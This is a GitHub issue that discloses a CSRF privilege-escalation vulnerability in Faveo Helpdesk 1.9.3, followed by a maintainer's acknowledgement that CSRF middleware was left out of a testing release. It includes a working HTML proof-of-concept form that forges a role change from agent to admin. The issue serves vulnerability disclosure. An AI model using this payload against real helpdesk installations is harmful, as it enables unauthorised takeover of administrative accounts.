Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CSRF Privilege Escalation (Manipulation of Role Agent to Admin) Vulnerability on Faveo version Community 1.9.3 #446

Closed
rungga opened this issue Apr 5, 2017 · 3 comments

Comments

Projects
None yet
3 participants
@rungga
Copy link

commented Apr 5, 2017

I. Background:
Faveo Helpdesk Open source ticketing system build on Laravel framework. Faveo word is derived from Latin which means to be favourable. Which truly highlights vision and the scope as well as the functionality of the product that Faveo is. It is specifically designed to cater the needs of startups and SME's empowering them with state of art, ticket based support system. In today's competitive startup scenario customer retention is one of the major challenges. Handling client query diligently is all the difference between retaining or losing a long lasting relationship.

II. Description:
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

Faveo have roles:

  • user (Cannot access backend)
  • agent (Can access backend but limited)
  • admin (Can full access backend)

III. Exploit:
CSRF Target is: “/public/rolechangeadmin/USER_ID”

user id = 11 (role is agent)

We have low privilege as “agent” to access application, and then want to change be admin role.

  • Make sample our script of CSRF (rolechange.html):
<html>
  <!-- CSRF PoC -->
  <body>
    <form action="http://192.168.228.186/faveo-helpdesk-1.9.3/public/rolechangeadmin/11" method="POST">
      <input type="hidden" name="group" value="1" />
      <input type="hidden" name="primary&#95;department" value="3" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
  • Before running “rolechange.html”, please login your account as agent and running your html script.
  • Yeaaah, now user id 11 become admin privilege ^_^

Refer:
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
https://www.owasp.org/index.php/Testing_for_Privilege_escalation_(OTG-AUTHZ-003)

--> I attach our screenshot and script CSRF:

1 record users

2 record users

3 agent cannot access admin

4 execute html script

5 role changed successfully

6 user id 11 become admin role

csrf-faveo-agent-to-admin.txt
livedemo.txt

@vijaysebastian

This comment has been minimized.

Copy link
Contributor

commented Apr 6, 2017

@rungga Firstly thanks to notifying this major issue. We are checking csrf token, But by mistake we have released testing copy. While testing we have removed some filters (middleware). We will make the release soon

@rungga

This comment has been minimized.

Copy link
Author

commented Apr 6, 2017

your welcome.

Faveo helpdesk application is good software for helping ITSM Process. I feel happy if I can help test for new version Faveo.

Don't be hesitate to contact me ^_^

@vijaysebastian

This comment has been minimized.

Copy link
Contributor

commented Apr 6, 2017

We are so happy to increase Faveo community! That is our vision too

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.